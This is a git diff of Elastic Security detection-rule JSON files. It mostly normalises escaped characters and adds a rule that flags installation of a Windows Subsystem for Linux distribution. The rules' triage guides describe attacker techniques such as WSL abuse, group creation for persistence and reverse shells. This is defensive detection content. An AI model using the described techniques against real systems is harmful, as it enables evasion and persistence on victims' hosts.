a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_4.json b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_4.json index 2d032823306..72f77660984 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_4.json +++ b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_4.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_5.json b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_5.json new file mode 100644 index 00000000000..ed4d5c76298 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_5.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects changes to the registry that indicates the install of a new Windows Subsystem for Linux distribution by name. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Subsystem for Linux Distribution Installed", + "note": "## Triage and analysis\n\n### Investigating Windows Subsystem for Linux Distribution Installed\n\nThe Windows Subsystem for Linux (WSL) lets developers install a Linux distribution (such as Ubuntu, OpenSUSE, Kali, Debian, Arch Linux, etc) and use Linux applications, utilities, and Bash command-line tools directly on Windows, unmodified, without the overhead of a traditional virtual machine or dualboot setup. Attackers may abuse WSL to avoid security protections on a Windows host and perform a wide range of attacks.\n\nThis rule identifies the installation of a new Windows Subsystem for Linux distribution via registry events.\n\n### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine which distribution was installed. Some distributions such as Kali Linux can facilitate the compromise of the environment.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate that the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This is a dual-use tool, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and the WSL distribution is homologated and approved in the environment.\n\n### Related Rules\n\n- Host Files System Changes via Windows Subsystem for Linux - e88d1fe9-b2f4-48d4-bace-a026dc745d4b\n- Execution via Windows Subsystem for Linux - db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd\n- Suspicious Execution via Windows Subsystem for Linux - 3e0eeb75-16e8-4f2f-9826-62461ca128b7\n- Windows Subsystem for Linux Enabled via Dism Utility - e2e0537d-7d8f-4910-a11d-559bcf61295a\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.path : \n (\"HK*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Lxss\\\\*\\\\PackageFamilyName\",\n \"\\\\REGISTRY\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Lxss\\\\*\\\\PackageFamilyName\")\n", + "references": [ + "https://learn.microsoft.com/en-us/windows/wsl/wsl-config" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a1699af0-8e1e-4ed0-8ec1-89783538a061", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timeline_id": "3e47ef71-ebfc-4520-975c-cb27fc090799", + "timeline_title": "Comprehensive Registry Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "a1699af0-8e1e-4ed0-8ec1-89783538a061_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_103.json b/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_103.json index 5b14fc6b023..87bfa580c04 100644 --- a/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_104.json b/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_104.json index 09c8fb49a2a..807423583b8 100644 --- a/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a17bcc91-297b-459b-b5ce-bc7460d8f82a_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_103.json b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_103.json index 15de158feb1..dda101f2238 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_103.json +++ b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_103.json @@ -64,7 +64,7 @@ ], "risk_score": 73, "rule_id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_104.json b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_104.json index 375257ae2d9..29cfabc4340 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_104.json @@ -64,7 +64,7 @@ ], "risk_score": 73, "rule_id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_105.json b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_105.json index 2600b6d98a5..53cb8414d0f 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_105.json @@ -64,7 +64,7 @@ ], "risk_score": 73, "rule_id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_106.json b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_106.json index 4614e5f5215..4ef2eabb3ee 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_106.json @@ -64,7 +64,7 @@ ], "risk_score": 73, "rule_id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_107.json b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_107.json index cbbb3cf3c01..9d3f82c6485 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_107.json +++ b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_107.json @@ -64,7 +64,7 @@ ], "risk_score": 73, "rule_id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_1.json b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_1.json index 0b195183b12..8d61e0dbb2e 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_1.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_2.json b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_2.json index 5a520ec0273..bd1f4057a9d 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_2.json +++ b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_2.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Group Creation", - "note": "## Triage and analysis\n\n### Investigating Linux Group Creation\n\nThe `groupadd` and `addgroup` commands are used to create new user groups in Linux-based operating systems.\n\nAttackers may create new groups to maintain access to victim systems or escalate privileges by assigning a compromised account to a privileged group.\n\nThis rule identifies the usages of `groupadd` and `addgroup` to create new groups.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the group was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify if a user account was added to this group after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Group creation is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created group and, in case an account was added to this group, delete the account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Linux Group Creation\n\nThe `groupadd` and `addgroup` commands are used to create new user groups in Linux-based operating systems.\n\nAttackers may create new groups to maintain access to victim systems or escalate privileges by assigning a compromised account to a privileged group.\n\nThis rule identifies the usages of `groupadd` and `addgroup` to create new groups.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the group was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify if a user account was added to this group after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Group creation is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created group and, in case an account was added to this group, delete the account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "iam where host.os.type == \"linux\" and (event.type == \"group\" and event.type == \"creation\") and\nprocess.name in (\"groupadd\", \"addgroup\") and group.name != null\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_3.json b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_3.json index 7e3d7e0a793..723ba6478c1 100644 --- a/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_3.json +++ b/packages/security_detection_engine/kibana/security_rule/a1c2589e-0c8c-4ca8-9eb6-f83c4bbdbe8f_3.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Group Creation", - "note": "## Triage and analysis\n\n### Investigating Linux Group Creation\n\nThe `groupadd` and `addgroup` commands are used to create new user groups in Linux-based operating systems.\n\nAttackers may create new groups to maintain access to victim systems or escalate privileges by assigning a compromised account to a privileged group.\n\nThis rule identifies the usages of `groupadd` and `addgroup` to create new groups.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the group was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify if a user account was added to this group after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Group creation is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created group and, in case an account was added to this group, delete the account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Linux Group Creation\n\nThe `groupadd` and `addgroup` commands are used to create new user groups in Linux-based operating systems.\n\nAttackers may create new groups to maintain access to victim systems or escalate privileges by assigning a compromised account to a privileged group.\n\nThis rule identifies the usages of `groupadd` and `addgroup` to create new groups.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the group was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify if a user account was added to this group after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Group creation is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created group and, in case an account was added to this group, delete the account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "iam where host.os.type == \"linux\" and (event.type == \"group\" and event.type == \"creation\") and\nprocess.name in (\"groupadd\", \"addgroup\") and group.name != null\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_103.json b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_103.json index 888ef85eef7..bd03b11775f 100644 --- a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_103.json +++ b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_103.json @@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_104.json b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_104.json index 861d4644218..711cb9412ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_104.json @@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_105.json b/packages/security_detection_engine/kibana/security_rule/a22a09c2-2162-4df0-a356-9aacbeb56a04_105.json index ce176504e58..48c6253415c 100644 --- 